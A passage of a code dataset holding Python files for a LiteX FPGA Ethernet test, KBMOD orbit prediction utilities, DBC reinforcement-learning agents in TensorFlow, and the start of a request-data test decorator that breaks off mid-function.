pll.create_clkout(self.cd_sys, sys_clk_freq)\n\n# RGMIITest ----------------------------------------------------------------------------------------\n\nclass RGMIITest(SoCMini):\n def __init__(self, platform, eth_phy=0, mac_address=0x10e2d5000000, ip_address=\"192.168.1.50\"):\n sys_clk_freq = int(133e6)\n\n # SoCMini ----------------------------------------------------------------------------------\n SoCMini.__init__(self, platform, sys_clk_freq)\n\n # CRG --------------------------------------------------------------------------------------\n self.submodules.crg = crg = _CRG(platform, sys_clk_freq)\n\n # 1 Gbps Ethernet --------------------------------------------------------------------------\n # phy\n ethphy = LiteEthPHYRGMII(\n clock_pads = platform.request(\"eth_clocks\", eth_phy),\n pads = platform.request(\"eth\", eth_phy))\n # core\n ethcore = LiteEthUDPIPCore(\n phy = ethphy,\n mac_address = mac_address,\n ip_address = ip_address,\n clk_freq = sys_clk_freq)\n self.submodules += ethphy, ethcore\n # timing constraints\n platform.add_period_constraint(ethphy.crg.cd_eth_rx.clk, 1e9/125e6)\n platform.add_false_path_constraints(crg.cd_sys.clk, ethphy.crg.cd_eth_rx.clk)\n\n # Led --------------------------------------------------------------------------------------\n counter = Signal(32)\n self.sync += counter.eq(counter + 1)\n self.comb += 
platform.request(\"user_led_n\").eq(counter[26])\n\n# Build --------------------------------------------------------------------------------------------\n\ndef main():\n platform = colorlight_5a_75b.Platform(revision=\"7.0\")\n soc = RGMIITest(platform)\n builder = Builder(soc, output_dir=\"build\")\n builder.build()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"5a-75b/rgmii_test.py","file_name":"rgmii_test.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"471029972","text":"from __future__ import print_function\n\nimport ephem\nimport os\nimport numpy as np\nimport pandas as pd\nimport astropy.units as u\nimport matplotlib.pyplot as plt\nfrom math import copysign\nfrom pyOrbfit.Orbit import Orbit\nfrom astropy.wcs import WCS\nfrom astropy.io import fits\nfrom astropy.time import Time\nfrom astropy.coordinates import SkyCoord\n\n\nclass ephem_utils(object):\n\n \"\"\"\n This class is designed to use the pyOrbfit python wrappers\n of the Bernstein and Khushalani (2000) orbit fitting code to\n predict orbits for search output from KBMOD.\n \"\"\"\n\n def __init__(self, results_filename, image_filename,\n visit_list, visit_mjd, results_visits, observatory):\n\n \"\"\"\n Read in the output from a KBMOD search and store as a pandas\n DataFrame.\n\n Take in a list of visits and times for those visits.\n\n Inputs\n ------\n results_filename: str\n The filename of the kbmod search results.\n\n image_filename: str\n The filename of the first image used in the kbmod search.\n\n visit_list: numpy array\n An array with all possible visit numbers in the search fields.\n\n visit_mjd: numpy array\n An array of the corresponding times in MJD for the visits listed\n in `visit_list`.\n\n results_visits: list\n A list of the visits actually searched by kbmod for the given\n results file.\n\n observatory: str\n The three character observatory code for the data searched.\n \"\"\"\n \n self.visit_df = pd.DataFrame(visit_list,\n columns=['visit_num'])\n self.visit_df['visit_mjd'] = visit_mjd\n\n results_array = np.genfromtxt(results_filename)\n\n # Only keep values and not property names from results file\n if len(np.shape(results_array)) == 1:\n results_proper = [results_array[1::2]]\n elif len(np.shape(results_array)) > 1:\n results_proper = results_array[:, 1::2]\n\n self.results_df = pd.DataFrame(results_proper,\n columns=['lh', 'flux', 'x0', 'y0',\n 'x_v', 'y_v', 'obs_count'])\n\n image_fits = fits.open(image_filename)\n self.wcs = WCS(image_fits[1].header)\n\n self.results_visits = results_visits\n\n self.results_mjd = self.visit_df[self.visit_df['visit_num'].isin(self.results_visits)]['visit_mjd'].values\n self.mjd_0 = self.results_mjd[0]\n\n self.obs = observatory\n\n def mpc_reader(self, filename):\n\n \"\"\"\n Read in a file with observations in MPC format and return the coordinates.\n\n Inputs\n ------\n filename: str\n The name of the file with the MPC-formatted observations.\n\n Returns\n -------\n c: astropy SkyCoord object\n A SkyCoord object with the ra, dec of the observations.\n \"\"\"\n iso_times = []\n time_frac = []\n ra = []\n dec = []\n\n with open(filename, 'r') as f:\n for line in f:\n year = str(line[15:19])\n month = str(line[20:22])\n day = str(line[23:25])\n iso_times.append(str('%s-%s-%s' % (year,month,day)))\n time_frac.append(str(line[25:31]))\n ra.append(str(line[32:44]))\n dec.append(str(line[44:56]))\n \n c = SkyCoord(ra, dec, unit=(u.hourangle, u.deg))\n\n return c\n\n 
def get_searched_radec(self, obj_idx):\n\n \"\"\"\n This will take an image and use its WCS to calculate the\n ra, dec locations of the object in the searched data.\n\n Inputs\n ------\n obj_idx: int\n The index of the object in the KBMOD results for which\n we want to calculate orbital elements/predictions.\n \"\"\"\n\n self.result = self.results_df.iloc[obj_idx]\n\n zero_times = self.results_mjd - self.mjd_0\n\n pix_coords_x = self.result['x0'] + \\\n self.result['x_v']*zero_times\n pix_coords_y = self.result['y0'] + \\\n self.result['y_v']*zero_times\n\n ra, dec = self.wcs.all_pix2world(pix_coords_x, pix_coords_y, 1)\n\n self.coords = SkyCoord(ra*u.deg, dec*u.deg)\n \n def format_results_mpc(self, file_out=None):\n\n \"\"\"\n This method will take in a row from the results file and output the\n astrometry of the object in the searched observations into a file with\n MPC formatting.\n\n Inputs\n ------\n file_out: str, default=None\n The output filename with the MPC-formatted observations\n of the KBMOD search result. If None, then it will save\n the output as 'kbmod_mpc.dat' and will be the default\n file in other methods below where file_in=None.\n \"\"\"\n\n field_times = Time(self.results_mjd, format='mjd')\n\n mpc_lines = []\n for t, c in zip(field_times, self.coords):\n mjd_frac = t.mjd % 1.0\n ra_hms = c.ra.hms\n dec_dms = c.dec.dms\n if dec_dms.d != 0:\n name = (\" c111112 c%4i %02i %08.5f %02i %02i %06.3f%+03i %02i %05.2f %s\" %\n (t.datetime.year, t.datetime.month, t.datetime.day+mjd_frac,\n ra_hms.h, ra_hms.m, ra_hms.s,\n dec_dms.d, np.abs(dec_dms.m), np.abs(dec_dms.s), self.obs))\n else:\n if copysign(1, dec_dms.d) == -1.0:\n dec_dms_d = '-00'\n else:\n dec_dms_d = '+00'\n name = (\" c111112 c%4i %02i %08.5f %02i %02i %06.3f%s %02i %05.2f %s\" %\n (t.datetime.year, t.datetime.month, t.datetime.day+mjd_frac,\n ra_hms.h, ra_hms.m, ra_hms.s,\n dec_dms_d, np.abs(dec_dms.m), np.abs(dec_dms.s), self.obs))\n\n print(name)\n mpc_lines.append(name)\n\n if file_out is None:\n file_out = 'kbmod_mpc.dat'\n\n with open(file_out, 'w') as f:\n for obs in mpc_lines:\n f.write(obs + '\\n')\n\n return\n\n def predict_ephemeris(self, date_range, file_in=None):\n\n \"\"\"\n Take in a time range before and after the initial observation of the object\n and predict the locations of the object along with the error parameters.\n\n Inputs\n ------\n date_range: numpy array\n The dates in MJD for predicted observations.\n\n file_in: str, default=None\n The MPC-formatted observations to use to fit the orbit and calculate\n predicted locations. 
If None, then by default will look for\n 'kbmod_mpc.dat'.\n\n Returns\n -------\n pred_ra: list\n A list of predicted ra coordinates in degrees.\n\n pred_dec: list\n A list of predicted dec coordinates in degrees.\n \"\"\"\n\n if file_in is None:\n file_in = 'kbmod_mpc.dat'\n o = Orbit(file=file_in)\n else:\n o = Orbit(file=file_in)\n self.coords = self.mpc_reader(file_in)\n\n pos_pred_list = []\n\n for d in date_range-15019.5: # Strange pyephem date conversion.\n date_start = ephem.date(d)\n pos_pred = o.predict_pos(date_start)\n pos_pred_list.append(pos_pred)\n\n pred_dec = []\n pred_ra = []\n\n for pp in pos_pred_list:\n pred_ra.append(np.degrees(pp['ra']))\n pred_dec.append(np.degrees(pp['dec']))\n\n return pred_ra, pred_dec\n\n def predict_elements(self, file_in=None):\n\n \"\"\"\n Predict the elements of the object\n\n Inputs\n ------\n file_in: str, default=None\n The MPC-formatted observations to use to fit the orbit and calculate\n predicted orbital elements and associated errors.\n If None, then by default will look for 'kbmod_mpc.dat'.\n\n Returns\n -------\n elements: dictionary\n A python dictionary with the orbital elements calculated from the\n Bernstein and Khushalani (2000) code.\n\n errs: dictionary\n A python dictionary with the calculated errors for the results in\n the `elements` dictionary.\n \"\"\"\n\n if file_in is None:\n file_in = 'kbmod_mpc.dat'\n o = Orbit(file=file_in)\n else:\n o = Orbit(file=file_in)\n self.coords = self.mpc_reader(file_in)\n\n elements, errs = o.get_elements()\n \n return elements, errs\n\n def predict_pixels(self, filename, obs_dates, file_in=None):\n\n \"\"\"\n Predict the pixels locations of the object in available data.\n\n Inputs\n ------\n filename: str\n The name of a processed image with a WCS that we can\n use to find the predicted pixel locations of the object.\n\n obs_dates: numpy array\n An array with times in MJD to predict the pixel locations\n of the object in the given image.\n\n file_in: str, default=None\n The MPC-formatted observations to use to fit the orbit and calculate\n predicted locations. If None, then by default will look for\n 'kbmod_mpc.dat'.\n\n Returns\n -------\n x_pix: numpy array\n A numpy array with the predicted x pixel locations of the object\n at the times from `obs_dates` in the given image.\n\n y_pix: numpy array\n A numpy array with the predicted y pixel locations of the object\n at the times from `obs_dates` in the given image.\n \"\"\"\n \n new_image = fits.open(filename)\n new_wcs = WCS(new_image[1].header)\n\n pred_ra, pred_dec = self.predict_ephemeris(obs_dates, \n file_in=file_in)\n\n x_pix, y_pix = new_wcs.all_world2pix(pred_ra, pred_dec, 1)\n\n return x_pix, y_pix\n\n def plot_predictions(self, date_range, file_in=None, include_obs=True):\n\n \"\"\"\n Take in results of B&K predictions along with errors and plot predicted path\n of objects.\n\n Inputs\n ------\n date_range: numpy array\n The dates in MJD for predicted observations.\n\n file_in: str, default=None\n The MPC-formatted observations to use to fit the orbit and calculate\n predicted locations. 
If None, then by default will look for\n 'kbmod_mpc.dat'.\n\n include_obs: boolean, default=True\n If true the plot will include the observations used in the\n KBMOD search.\n\n Returns\n -------\n fig: matplotlib figure\n Figure object with the predicted locations for the object in\n ra, dec space color-coded by time of observation.\n \"\"\"\n\n pred_ra, pred_dec = self.predict_ephemeris(date_range, \n file_in=file_in)\n\n fig = plt.figure()\n plt.scatter(pred_ra, pred_dec, c=date_range)\n cbar = plt.colorbar(label='mjd', orientation='horizontal',\n pad=0.15)\n if include_obs is True:\n plt.scatter(self.coords.ra.deg, self.coords.dec.deg, \n marker='+', s=296, edgecolors='r',\n #facecolors='none', \n label='Observed Points', lw=4)\n plt.legend()\n plt.xlabel('ra')\n plt.ylabel('dec')\n\n return fig\n","sub_path":"analysis/ephem_utils.py","file_name":"ephem_utils.py","file_ext":"py","file_size_in_byte":11711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"387120105","text":"#Learning Invariant Representations for Reinforcement Learning without Reconstruction, A. Zhang et al, 2020.\n\nimport tensorflow as tf\nimport numpy as np\n\nfrom Networks.Gaussian_Actor import Squashed_Gaussian_Actor\nfrom Networks.Basic_Networks import Q_network, Policy_network\nfrom Networks.Encoder import PixelEncoder\nfrom Networks.DBC_Networks import Reward_Network, Transition_Network\n\nfrom Common.Utils import copy_weight, soft_update\nfrom Common.Buffer import Buffer\n\nclass DBC_SACv2:\n def __init__(self, obs_dim, action_dim, args):\n\n self.buffer = Buffer(args.buffer_size)\n\n self.obs_dim = obs_dim\n self.action_dim = action_dim\n\n self.log_alpha = tf.Variable(initial_value=tf.math.log(args.alpha), trainable=True)\n self.target_entropy = -action_dim\n self.gamma = args.gamma\n self.bisim_coef = args.bisim_coef\n\n self.batch_size = args.batch_size\n self.feature_dim = args.feature_dim\n\n self.layer_num = args.layer_num\n self.filter_num = args.filter_num\n self.tau = args.tau\n self.encoder_tau = args.encoder_tau\n\n self.actor_update = args.actor_update\n self.critic_update = args.critic_update\n\n self.training_start = args.training_start\n self.train_alpha = args.train_alpha\n\n self.actor = Squashed_Gaussian_Actor(self.feature_dim, self.action_dim, args.hidden_dim, args.log_std_min, args.log_std_max)\n self.critic1 = Q_network(self.feature_dim, self.action_dim, args.hidden_dim)\n self.critic2 = Q_network(self.feature_dim, self.action_dim, args.hidden_dim)\n self.target_critic1 = Q_network(self.feature_dim, self.action_dim, args.hidden_dim)\n self.target_critic2 = Q_network(self.feature_dim, self.action_dim, args.hidden_dim)\n\n self.encoder = PixelEncoder(self.obs_dim, self.feature_dim, self.layer_num, self.filter_num)\n self.target_encoder = PixelEncoder(self.obs_dim, self.feature_dim, self.layer_num, self.filter_num)\n\n self.dynamics_model = Transition_Network(self.feature_dim, action_dim, deterministic=False)\n self.reward_model = Reward_Network(self.feature_dim)\n\n copy_weight(self.critic1, self.target_critic1)\n copy_weight(self.critic2, self.target_critic2)\n copy_weight(self.encoder, self.target_encoder)\n\n self.actor_optimizer = tf.keras.optimizers.Adam(args.actor_lr)\n self.critic1_optimizer = tf.keras.optimizers.Adam(args.critic_lr)\n self.critic2_optimizer = tf.keras.optimizers.Adam(args.critic_lr)\n\n self.encoder_optimizer = tf.keras.optimizers.Adam(args.encoder_lr)\n self.log_alpha_optimizer = 
tf.keras.optimizers.Adam(args.alpha_lr)\n\n self.dynamics_optimizer = tf.keras.optimizers.Adam(args.decoder_lr)\n self.reward_optimizer = tf.keras.optimizers.Adam(args.decoder_lr)\n\n self.current_step = 0\n\n self.name = 'DBC_SACv2'\n\n @property\n def alpha(self):\n return tf.exp(self.log_alpha)\n\n def get_action(self, obs):\n obs = np.expand_dims(np.array(obs), axis=0)\n feature = self.encoder(obs)\n action, _ = self.actor(feature)\n action = action.numpy()[0]\n\n return action\n\n def eval_action(self, obs):\n obs = np.expand_dims(np.array(obs), axis=0)\n feature = self.encoder(obs)\n action, _ = self.actor(feature, deterministic=True)\n action = action.numpy()[0]\n\n return action\n\n def train(self, local_step):\n self.current_step += 1\n total_a_loss = 0\n total_c1_loss, total_c2_loss = 0, 0\n total_alpha_loss = 0\n total_encoder_loss = 0\n total_dynamics_loss = 0\n total_reward_loss = 0\n loss_list = []\n s, a, r, ns, d = self.buffer.sample(self.batch_size)\n\n ns_action, ns_logpi = self.actor(self.encoder(ns))\n\n target_min_aq = tf.minimum(self.target_critic1(self.target_encoder(ns), ns_action),\n self.target_critic2(self.target_encoder(ns), ns_action))\n\n target_q = tf.stop_gradient(r + self.gamma * (1 - d) * (target_min_aq - self.alpha.numpy() * ns_logpi))\n\n with tf.GradientTape(persistent=True) as tape1:\n critic1_loss = tf.reduce_mean(tf.square(self.critic1(self.encoder(s), a) - target_q))\n critic2_loss = tf.reduce_mean(tf.square(self.critic2(self.encoder(s), a) - target_q))\n\n critic1_gradients = tape1.gradient(critic1_loss, self.encoder.trainable_variables + self.critic1.trainable_variables)\n self.critic1_optimizer.apply_gradients(zip(critic1_gradients, self.encoder.trainable_variables + self.critic1.trainable_variables))\n\n critic2_gradients = tape1.gradient(critic2_loss, self.encoder.trainable_variables + self.critic2.trainable_variables)\n self.critic2_optimizer.apply_gradients(zip(critic2_gradients, self.encoder.trainable_variables + self.critic2.trainable_variables))\n\n del tape1\n\n if self.current_step % self.actor_update == 0:\n with tf.GradientTape() as tape2:\n\n s_action, s_logpi = self.actor(tf.stop_gradient(self.encoder(s)))\n\n min_aq_rep = tf.minimum(self.critic1(tf.stop_gradient(self.encoder(s)), s_action),\n self.critic2(tf.stop_gradient(self.encoder(s)), s_action))\n\n actor_loss = tf.reduce_mean(self.alpha.numpy() * s_logpi - min_aq_rep)\n\n actor_gradients = tape2.gradient(actor_loss, self.actor.trainable_variables)\n self.actor_optimizer.apply_gradients(zip(actor_gradients, self.actor.trainable_variables))\n\n del tape2\n\n if self.train_alpha == True:\n with tf.GradientTape() as tape3:\n _, s_logpi = self.actor(self.encoder(s))\n alpha_loss = -(tf.exp(self.log_alpha) * tf.stop_gradient(s_logpi+ self.target_entropy))\n alpha_loss = tf.nn.compute_average_loss(alpha_loss)\n #alpha_loss = tf.reduce_mean(alpha_loss)\n\n log_alpha_gradients = tape3.gradient(alpha_loss, [self.log_alpha])\n self.log_alpha_optimizer.apply_gradients(zip(log_alpha_gradients, [self.log_alpha]))\n\n del tape3\n\n\n if self.current_step % self.critic_update == 0:\n soft_update(self.critic1, self.target_critic1, self.tau)\n soft_update(self.critic2, self.target_critic2, self.tau)\n soft_update(self.encoder, self.target_encoder, self.encoder_tau)\n\n #train encoder\n with tf.GradientTape() as tape4:\n new_ids = np.arange(len(s))\n np.random.shuffle(new_ids)\n s2 = tf.gather(s, new_ids)\n\n feature = self.encoder(s)\n #feature2 = tf.gather(feature, new_ids)\n feature2 = 
self.encoder(s2)\n\n reward = self.reward_model(tf.stop_gradient(feature))\n #reward2 = tf.gather(reward, new_ids)\n reward2 = self.reward_model(tf.stop_gradient(feature2))\n\n feature_action, _ = self.actor(tf.stop_gradient(feature), True)\n feature2_action, _ = self.actor(tf.stop_gradient(feature2), True)\n\n mu, sigma = self.dynamics_model(tf.concat([tf.stop_gradient(feature), feature_action], axis=1))\n mu2, sigma2 = self.dynamics_model(tf.concat([tf.stop_gradient(feature2), feature2_action], axis=1))\n\n z_dist = tf.reshape(tf.keras.losses.huber(feature, feature2), shape=tf.shape(feature))\n r_dist = tf.reshape(tf.keras.losses.huber(reward, reward2), shape=tf.shape(reward))\n transition_dist = tf.sqrt(tf.square(mu - mu2) + tf.square(sigma - sigma2))\n\n bisimilarity = r_dist + self.gamma * transition_dist\n encoder_loss = tf.reduce_mean(tf.square(z_dist - bisimilarity))\n\n encoder_gradients = tape4.gradient(encoder_loss, self.encoder.trainable_variables)\n self.encoder_optimizer.apply_gradients(zip(encoder_gradients, self.encoder.trainable_variables))\n\n #train dynamics\n with tf.GradientTape() as tape5:\n feature = self.encoder(s)\n mu, sigma = self.dynamics_model(tf.concat([feature, a], axis=1))\n\n if (sigma[0][0].numpy() == 0):\n if self.dynamics_model.deterministic == False:\n print(\"error\")\n sigma = tf.ones_like(mu)\n\n next_feature = self.encoder(ns)\n diff = (mu - tf.stop_gradient(next_feature)) / sigma\n\n dynamics_loss = tf.reduce_mean(0.5 * tf.square(diff) + tf.math.log(sigma))\n\n dynamics_gradients = tape5.gradient(dynamics_loss, self.encoder.trainable_variables + self.dynamics_model.trainable_variables)\n self.dynamics_optimizer.apply_gradients(zip(dynamics_gradients, self.encoder.trainable_variables + self.dynamics_model.trainable_variables))\n\n #train reward\n with tf.GradientTape() as tape6:\n feature = self.encoder(s)\n sample_dynamics = self.dynamics_model.sample(tf.concat([feature, a], axis=1))\n reward_prediction = self.reward_model(sample_dynamics)\n\n reward_loss = tf.reduce_mean(tf.square(reward_prediction - r))\n\n reward_gradients = tape6.gradient(reward_loss, self.encoder.trainable_variables + self.reward_model.trainable_variables)\n self.reward_optimizer.apply_gradients(zip(reward_gradients, self.encoder.trainable_variables + self.reward_model.trainable_variables))\n\n\n total_c1_loss += critic1_loss.numpy()\n total_c2_loss += critic2_loss.numpy()\n\n loss_list.append(['Loss/Critic1', total_c1_loss])\n loss_list.append(['Loss/Critic2', total_c2_loss])\n\n if self.current_step % self.actor_update == 0:\n total_a_loss += actor_loss.numpy()\n loss_list.append(['Loss/Actor', total_a_loss])\n\n total_encoder_loss += encoder_loss.numpy()\n loss_list.append(['Loss/Encoder', total_encoder_loss])\n\n total_dynamics_loss += dynamics_loss.numpy()\n loss_list.append(['Loss/Dynamics', total_dynamics_loss])\n\n total_reward_loss += reward_loss.numpy()\n loss_list.append(['Loss/Reward', total_reward_loss])\n\n if self.current_step % self.actor_update == 0 and self.train_alpha == True:\n total_alpha_loss += alpha_loss.numpy()\n loss_list.append(['Loss/Alpha', total_alpha_loss])\n\n loss_list.append(['Alpha', tf.exp(self.log_alpha).numpy()])\n\n return loss_list\n\n\n\n\n\nclass DBC_TD3:\n def __init__(self, obs_dim, action_dim, hidden_dim=512, gamma=0.99, learning_rate=0.001, batch_size=512, policy_delay=2, actor_noise=0.1, target_noise=0.2, noise_clip=0.5, buffer_size=1e6,\n feature_dim=50, layer_num=4, filter_num=32, tau=0.005, encoder_tau=0.005, bisim_coef = 0.5, 
training_start=1000):\n\n self.buffer = Buffer(buffer_size)\n\n self.obs_dim = obs_dim\n self.action_dim = action_dim\n\n self.hidden_dim = hidden_dim\n self.gamma = gamma\n self.learning_rate = learning_rate\n\n self.batch_size = batch_size\n self.feature_dim = feature_dim\n\n self.layer_num = layer_num\n self.filter_num = filter_num\n self.tau = tau\n self.encoder_tau = encoder_tau\n self.bisim_coef = bisim_coef\n\n self.policy_delay = policy_delay\n self.actor_noise = actor_noise\n self.target_noise = target_noise\n self.noise_clip = noise_clip\n\n self.training_start = training_start\n\n self.actor = Policy_network(feature_dim, action_dim, (hidden_dim, hidden_dim))\n self.target_actor = Policy_network(feature_dim, action_dim, (hidden_dim, hidden_dim))\n self.critic1 = Q_network(feature_dim, action_dim, (hidden_dim, hidden_dim))\n self.critic2 = Q_network(feature_dim, action_dim, (hidden_dim, hidden_dim))\n self.target_critic1 = Q_network(feature_dim, action_dim, (hidden_dim, hidden_dim))\n self.target_critic2 = Q_network(feature_dim, action_dim, (hidden_dim, hidden_dim))\n\n self.encoder = PixelEncoder(self.obs_dim, feature_dim, layer_num, filter_num)\n self.target_encoder = PixelEncoder(self.obs_dim, feature_dim, layer_num, filter_num)\n\n self.dynamics_model = Transition_Network(feature_dim, action_dim)\n self.reward_model = Reward_Network(feature_dim)\n\n copy_weight(self.actor, self.target_actor)\n copy_weight(self.critic1, self.target_critic1)\n copy_weight(self.critic2, self.target_critic2)\n copy_weight(self.encoder, self.target_encoder)\n\n self.actor_optimizer = tf.keras.optimizers.Adam(learning_rate)\n self.critic1_optimizer = tf.keras.optimizers.Adam(learning_rate)\n self.critic2_optimizer = tf.keras.optimizers.Adam(learning_rate)\n\n self.encoder_optimizer = tf.keras.optimizers.Adam(learning_rate)\n self.dynamics_optimizer = tf.keras.optimizers.Adam(learning_rate)\n self.reward_optimizer = tf.keras.optimizers.Adam(learning_rate)\n\n self.name = 'DBC_TD3'\n\n def get_action(self, obs):\n obs = np.expand_dims(np.array(obs), axis=0)\n feature = self.encoder(obs)\n action = self.actor(feature).numpy()[0]\n\n return action\n\n def train(self, local_step):#critic -> transition -> reward -> encoder -> actor\n set1, set2 = self.buffer.dbc_sample(self.batch_size)\n\n s, a, r, ns, d = set1\n s2, a2, r2, ns2, d2 = set2\n\n target_action = tf.clip_by_value(self.target_actor(self.target_encoder(ns)) + tf.clip_by_value(\n tf.random.normal(shape=self.target_actor(self.target_encoder(ns)).shape, mean=0, stddev=self.target_noise), -self.noise_clip,\n self.noise_clip), -1, 1)\n\n target_value = tf.stop_gradient(\n r + self.gamma * (1 - d) * tf.minimum(self.target_critic1(self.target_encoder(ns), target_action),\n self.target_critic2(self.target_encoder(ns), target_action)))\n\n with tf.GradientTape(persistent=True) as tape1:\n critic1_loss = 0.5 * tf.reduce_mean(tf.square(target_value - self.critic1(self.encoder(s), a)))\n critic2_loss = 0.5 * tf.reduce_mean(tf.square(target_value - self.critic2(self.encoder(s), a)))\n\n critic1_grad = tape1.gradient(critic1_loss, self.encoder.trainable_variables + self.critic1.trainable_variables)\n self.critic1_optimizer.apply_gradients(zip(critic1_grad, self.encoder.trainable_variables + self.critic1.trainable_variables))\n\n critic2_grad = tape1.gradient(critic2_loss, self.encoder.trainable_variables + self.critic2.trainable_variables)\n self.critic2_optimizer.apply_gradients(zip(critic2_grad, self.encoder.trainable_variables + 
self.critic2.trainable_variables))\n\n del tape1\n\n #train dynamics\n with tf.GradientTape() as tape2:\n feature = self.encoder(s)\n next_feature = self.encoder(ns)\n mu, sigma = self.dynamics_model(tf.concat([feature, a], axis=1))\n\n if (sigma[0][0].numpy() == 0):\n sigma = tf.ones_like(mu)\n diff = (mu - tf.stop_gradient(next_feature))/sigma\n dynamics_loss = tf.reduce_mean(0.5 * tf.square(diff) + tf.math.log(sigma))\n\n dynamics_gradients = tape2.gradient(dynamics_loss, self.encoder.trainable_variables + self.dynamics_model.trainable_variables)\n self.dynamics_optimizer.apply_gradients(zip(dynamics_gradients, self.encoder.trainable_variables + self.dynamics_model.trainable_variables))\n\n #dynamics_gradients = tape2.gradient(dynamics_loss, self.dynamics_model.trainable_variables)\n #self.dynamics_optimizer.apply_gradients(zip(dynamics_gradients, self.dynamics_model.trainable_variables))\n\n del tape2\n\n #train reward\n with tf.GradientTape() as tape3:\n feature = self.encoder(s)\n sample_dynamics = self.dynamics_model.sample(tf.concat([feature, a], axis=1))\n reward_prediction = self.reward_model(sample_dynamics)\n\n reward_loss = tf.reduce_mean(tf.square(reward_prediction - (r)))\n\n reward_gradients = tape3.gradient(reward_loss, self.encoder.trainable_variables + self.reward_model.trainable_variables)\n self.reward_optimizer.apply_gradients(zip(reward_gradients, self.encoder.trainable_variables + self.reward_model.trainable_variables))\n\n #reward_gradients = tape3.gradient(reward_loss, self.reward_model.trainable_variables)\n #self.reward_optimizer.apply_gradients(zip(reward_gradients, self.reward_model.trainable_variables))\n\n del tape3\n\n #train encoder\n with tf.GradientTape() as tape4:\n feature1 = self.encoder(s)\n feature2 = self.encoder(s2)\n\n mu1, sigma1 = self.dynamics_model(tf.concat([feature1, a], axis=1))\n mu2, sigma2 = self.dynamics_model(tf.concat([feature2, a2], axis=1))\n\n z_dist = tf.abs(feature1 - feature2)\n r_dist = tf.abs(r - r2)\n\n transition_dist = tf.sqrt(tf.square(tf.abs(mu1 - mu2)) + tf.square(tf.abs(sigma1 - sigma2)))\n bisimilarity = tf.stop_gradient(tf.cast(r_dist, tf.float32) + self.gamma * tf.cast(transition_dist, tf.float32))\n encoder_loss = self.bisim_coef * tf.reduce_mean(tf.square(z_dist - bisimilarity))\n\n encoder_gradients = tape4.gradient(encoder_loss, self.encoder.trainable_variables)\n self.encoder_optimizer.apply_gradients(zip(encoder_gradients, self.encoder.trainable_variables))\n\n del tape4\n\n if local_step % (self.policy_delay) == 0:\n with tf.GradientTape() as tape5:\n actor_loss = -tf.reduce_mean(self.critic1(tf.stop_gradient(self.encoder(s)), self.actor(tf.stop_gradient(self.encoder(s)))))\n\n actor_grad = tape5.gradient(actor_loss, self.actor.trainable_variables)\n self.actor_optimizer.apply_gradients(zip(actor_grad, self.actor.trainable_variables))\n\n del tape5\n\n soft_update(self.actor, self.target_actor, self.tau)\n soft_update(self.critic1, self.target_critic1, self.tau)\n soft_update(self.critic2, self.target_critic2, self.tau)\n soft_update(self.encoder, self.target_encoder, self.encoder_tau)\n\n\n\n\n\n\n\n","sub_path":"Algorithms/ImageRL/DBC.py","file_name":"DBC.py","file_ext":"py","file_size_in_byte":18257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"626737396","text":"# -*- coding:utf-8 -*-\nimport inspect\nimport urllib\nimport urlparse\nimport re\nimport json\nimport copy\n\nfrom common.exceptions import BorrowerResponseException, 
LenderResponseException\nfrom common.global_config import Global\nfrom common.lib.json_handler import handle_item_in_json\nfrom common.service_helper import ServiceHelperSingleton\nfrom common.utility import Utility\n\n\ndef retrieve_value_from_dict(target_key, target_dict):\n \"\"\"\n retrieve value from dict whose keys may be tuple and input target_key is in the tuple.\n \"\"\"\n for key in target_dict.keys():\n\n if isinstance(key, tuple):\n if target_key in key:\n return target_dict[key]\n elif target_key == key:\n return target_dict[target_key]\n\n\ndef set_request_data_from_args(func):\n def wrapper(entity, *args, **kwargs):\n if not entity._data and entity._has_data_pattern:\n function_inspect = inspect.getargspec(entity._set_data_pattern)\n\n if len(function_inspect.args) <= 1 and \\\n function_inspect.varargs is None and function_inspect.keywords is None:\n entity._set_data_pattern()\n else:\n args, kwargs = entity._set_data_pattern(*args, **kwargs) or (\n args, kwargs)\n\n data_pattern = entity.current_data_pattern\n encode_str = lambda x: (type(x) == unicode) and \\\n unicode(x).encode('utf-8') or str(x)\n if data_pattern:\n data = ''\n\n def handle_str_fake(data):\n find_fake_phrases_pattern = r'fake(?:_en|_cn)?.\\w*'\n find_only_fake_pattern = r'^fake(?:_en|_cn)?.'\n if re.search(find_fake_phrases_pattern, data):\n phrases = re.findall(find_fake_phrases_pattern, data)\n for fake_item in phrases:\n fake_object = getattr(entity.utility,\n re.search(\n r\"^fake(?:_en|_cn)?\",\n fake_item).group())\n\n fake_attribute = re.sub(find_only_fake_pattern, '',\n fake_item)\n faked_value = getattr(fake_object, fake_attribute)()\n data = re.sub(find_fake_phrases_pattern,\n encode_str(faked_value),\n encode_str(data), 1)\n return data\n\n def handle_str_data_patten():\n def prepare_url_dict(l_arg):\n rt_dict = {}\n keys = [t_items[0] for t_items in l_arg]\n values = [unicode(t_items[1]).encode('utf-8') for\n t_items in l_arg]\n for item in keys:\n index_num = keys.index(item)\n temp_count = keys.count(item)\n if temp_count > 1:\n temp_l = tuple(\n [i for i in\n values[index_num:index_num + temp_count]])\n rt_dict.update({item: temp_l})\n else:\n rt_dict.update({item: values[index_num]})\n return rt_dict\n\n if args:\n parsed_data_pattern = urlparse.parse_qsl(data_pattern)\n number_of_args_difference = len(\n parsed_data_pattern) - len(args)\n zipped_list = zip([list(i)\n for i in parsed_data_pattern], args)\n tmp_list = [list(i) for i in zipped_list]\n new_list = []\n for i in tmp_list:\n i[0][1] = i[1]\n new_list.append(i[0])\n data = urllib.urlencode(prepare_url_dict(new_list), 1)\n if number_of_args_difference:\n data += '&' + \\\n urllib.urlencode(prepare_url_dict(\n parsed_data_pattern[\n -number_of_args_difference:]), 1)\n else:\n data = data_pattern\n\n if kwargs:\n decode_str = lambda x: (type(\n x) == str) and x.decode(\"utf8\") or unicode(x)\n keyword_sub_pattern = u\"=[\\u4e00-\\u9fa5/%A-Za-z0-9_.-]*(?=&)?\"\n for k in kwargs:\n if not re.search(k + keyword_sub_pattern, data):\n raise KeyError('kwargs does not exists!')\n data = encode_str(re.sub(k + keyword_sub_pattern,\n k + '=' + decode_str(kwargs[k]),\n decode_str(data)))\n\n return data\n\n def handle_dict_data_pattern():\n if kwargs:\n for k in kwargs:\n node, key = 